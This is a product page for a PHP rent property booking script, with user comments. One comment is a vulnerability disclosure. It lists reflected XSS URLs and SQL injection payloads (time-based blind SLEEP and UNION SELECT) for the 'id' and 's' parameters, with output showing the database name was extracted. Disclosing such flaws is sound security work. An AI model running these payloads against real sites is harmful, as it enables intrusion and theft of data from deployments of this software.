HouseKit - Rent Property Booking PHP ScriptHouseKit - Rent Property Booking PHP Script
Core PHP Rent Property Booking System, All Pages are addedHouseKit - Rent Property Booking PHP Script
Core PHP Rent Property Booking System, All Pages are added3 Support questions or comments
Please login or create an account to post a question or comment.
-
May 11, 2023This script is vulnerable to RXSS and SQL Injection
Author : CraCkEr
Date: 10/05/2023
--- XSS Vulnerability ---
Path: /flat_details.php
GET parameter 'id' is vulnerable to RXSS
https://website/flat_details.php?id=22&id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
Path: /flats.php
GET parameter 's' is vulnerable to RXSS
https://website/flats.php?tab=on&s=Hyderabadi3phy%3cscript%3ealert(1)%3c%2fscript%3ezx0nx
--- END ---
--- SQL Inejection Vulnerability ---
Path: /flat_details.php
GET parameter 'id' is vulnerable to SQL Injection
https://website/flat_details.php?id=[SQLI]
---
Parameter: id (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=22 AND (SELECT 2116 FROM (SELECT(SLEEP(5)))vxMc)
Type: UNION query
Title: Generic UNION query (NULL) - 8 columns
Payload: id=-4049 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716b706271,0x4175424a73725a4b6b757359756765517a78784a6b50706b464f474978545652546a4a496c505841,0x716b6a6271),NULL,NULL,NULL-- -
---
Path: /flats.php
GET parameter 's' is vulnerable to SQL Injection
https://website/flats.php?tab=on&s=[SQLI]
---
Parameter: s (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: tab=on&s=Hyderabad' AND (SELECT 5046 FROM (SELECT(SLEEP(5)))BKYF) AND 'ReOi'='ReOi
Type: UNION query
Title: Generic UNION query (NULL) - 8 columns
Payload: tab=on&s=Hyderabad' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7170706a71,0x6e536b46764c48414b6663545a4f78576a56794c74766e5351494f624c786261797255684d5a6d6d,0x716a767071),NULL,NULL,NULL-- -
---
fetching current database
current database: '2940126_housekit
[-] Done'
-
Jan 10, 2020Hello,
I would like to buy your script but can you do the following below;
Can you add a feature for managing TENANTS WITH MONTHLY RENTAL SUBSCRIPTION such that the system is able to create monthly recurring invoices for tenants. The next month invoice get created when left with 5 days the current month to expire and payable in 5days at start of a new month
I will be happy to hear from you
Thank you
Ronnie
-
Dec 6, 2019I don't just know how you expect someone to buy you any script from you when no one answers them and you need a team to take care of the customers so your projects make sense to me ?
-
Dec 6, 2019RohitChouhan AuthorDear sir, we have a specific time to work and feedback to customers.
Your timezone is different. Sometimes our team is bustling with big deal and meetings. Have an inquiry Please Kindly mail to [email protected].
Thank you.
Information
Category | Scripts & Code / PHP Scripts / Miscellaneous |
First release | 4 December 2019 |
Last update | 4 December 2019 |
Software version | PHP 7.0, PHP 7.1, PHP 7.2, PHP 5.x |
Files included | .php, .css, .html, .sql, Javascript .js |
Database | MySQL 4.x, MySQL 5.x |
Tags | booking, hotel, property, rent, core PHP |